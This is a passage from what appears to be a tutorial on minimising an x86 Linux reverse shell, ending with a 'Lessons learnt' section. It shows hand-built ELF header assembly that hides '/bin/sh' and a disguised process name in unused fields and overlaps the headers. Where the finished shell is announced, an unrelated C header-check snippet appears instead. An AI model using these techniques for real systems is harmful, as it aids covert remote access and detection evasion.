As a result, the code shrinks by another 25 bytes; now its size is 279 bytes. Reducing it further requires creativity and patience.

Bonus: sploiting headers

An ELF header includes space that is filled with zeros by default, and the system doesn’t check these values when the file is loaded and executed (although certain tools do). This space is located within e_ident (the first 16 bytes of the file) and starts at offset 9 (EI_PAD). The byte at offset 8, EI_ABIVERSION, which describes the ABI version for object files, is irrelevant for you since your shellcode isn’t written for the ARM architecture. Therefore, you can safely use the 8 bytes starting at offset 8. This is just enough for "/bin/sh" with its terminating null byte. But how do you correctly specify the offset to it in the code without calculating or changing it manually?

The answer is: change the build process. Since you are going to hand-craft the ELF header that the linker would normally generate, you cannot use the linker. For such situations, NASM allows you to specify the ‘raw’ output format: nasm -f bin asm_shell.asm -o asm_shell.raw. NASM then builds the file exactly as defined in the source code, without adding any headers to it. You have to specify the address where this file will be loaded so that NASM can correctly calculate the entry point and other addresses. For this purpose, the org 0x08048000 directive is used.

There is one more thing that you can change without hampering the binary’s workability: the previously zeroed information about the section table. The ELF header contains the following fields in a row:

  • e_shoff, e_flags (8 bytes)
  • e_shentsize, e_shnum, e_shstrndx (6 bytes)

The e_flags field does not describe SHT; according to the documentation, it’s intended for certain processor flags. But since none of them are currently defined, you can safely use 8 bytes from the first chain of fields. NEW_ARGV will perfectly fit there.

The second chain can be used to store the code that terminates the process in case of an unsuccessful connection (it occupies 5 bytes), and a jmp _exit takes its original place, saving 3 more bytes. Your manually assembled header now looks as follows:

org 0x08048000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF" ; e_ident
db 1, 1, 1, 0
BIN_SH:
db "/bin/sh", 0
e_type:
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
NEW_ARGV:
db "s0l3g1t", 0 ; e_shoff, e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
_exit:
push NR_EXIT ; e_shentsize
pop eax ; e_shnum
; exit_code = random :D ; e_shstrndx
int 0x80
db 0
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd filesize ; p_memsz
dd 5 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr
...

After all these manipulations, the binary is 254 bytes in size. What else can be done? For instance, you can make the ELF header and the Program Header Table overlap (as suggested in the above-mentioned tutorial “Size Is Everything”). This is possible because the last 8 bytes of the ELF header can be made identical to the first 8 bytes of the PHT, and the ELF header fields that receive new values this way are not critical for execution. But in this case, you have to move the _exit code previously put into the header back to its original place. After playing a bit with registers, you get a reverse shell 237 bytes in size. This is roughly one twentieth of its original size!

Here it is
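The overlap condition can be checked mechanically. This sketch (the function name is hypothetical) compares the last 8 bytes of an Elf32_Ehdr with the first 8 bytes of an Elf32_Phdr. With e_phnum = 1 and all section table fields zeroed, they match p_type = PT_LOAD and p_offset = 0; once the _exit code occupies e_shentsize, they no longer do, which is why that code had to go back to its original place.

```c
#include <assert.h>
#include <elf.h>
#include <string.h>

/* Returns 1 if the program header can start 8 bytes before the end of the
 * ELF header: e_phnum..e_shstrndx must equal p_type and p_offset. */
static int phdr_can_overlap(const Elf32_Ehdr *eh, const Elf32_Phdr *ph) {
    const unsigned char *tail = (const unsigned char *)eh + sizeof *eh - 8;
    return memcmp(tail, ph, 8) == 0;
}
```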

Lessons learnt

First, a reverse shell can be ridiculously tiny if necessary. Second, 32-bit processes can execute execve() and become 64-bit ones. Headers in ELF files can overlap; if it’s done properly, the file will work just fine. And if a process changes its name, it may leave traces.

Your reverse shell is fully operational, and you can add more functionality to it. For instance, teach the shell to ignore signals, scan ports, encrypt traffic… But that’s another story. Good luck in your endeavors!

